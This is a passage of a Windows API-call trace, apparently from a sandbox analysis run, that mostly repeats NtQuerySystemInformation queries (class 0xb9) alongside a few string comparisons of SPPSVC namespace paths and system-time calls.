NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.404] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0280.411] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0280.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x28, ResultLength=0x0) [0280.423] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x28, ResultLength=0x0) [0280.423] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0280.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x28, ResultLength=0x0) [0280.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0280.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x28, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x20, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x20, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x20, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.434] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fce80 | out: lpSystemTimeAsFileTime=0xf7a68fce80*(dwLowDateTime=0x398359c6, dwHighDateTime=0x1d63874)) [0280.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0280.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce70, Length=0x28, ResultLength=0x0) [0280.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0280.434] GetTickCount () returned 0x118636b [0280.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc58, Length=0x58, ResultLength=0x0) [0280.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.437] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x28, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x28, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.438] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0280.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x28, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x38, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x20, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc980, Length=0x20, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0280.442] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 